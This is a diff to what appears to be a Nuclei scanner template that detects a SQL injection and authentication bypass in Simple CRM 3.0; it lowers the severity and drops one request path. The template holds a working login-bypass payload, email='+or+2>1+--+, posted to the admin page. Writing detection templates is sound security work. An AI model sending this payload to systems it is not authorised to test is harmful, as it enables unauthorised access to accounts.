--- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml
+++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml
@@ -3,7 +3,7 @@ id: simple-crm-sql-injection
 info:
   name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass
   author: geeknik
-  severity: critical
+  severity: high
   reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
   tags: sqli,simplecrm,auth-bypass
 
@@ -13,20 +13,17 @@ requests:
       - "{{BaseURL}}/scrm/crm/admin"
     body: "email='+or+2>1+--+&password=&login="
 
-  - method: POST
-    path:
-      - "{{BaseURL}}/crm/admin"
-    body: "email='+or+2>1+--+&password=&login="
-
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "<script>window.location.href='home.php'</script>"
         part: body
+
       - type: word
         words:
           - "text/html"
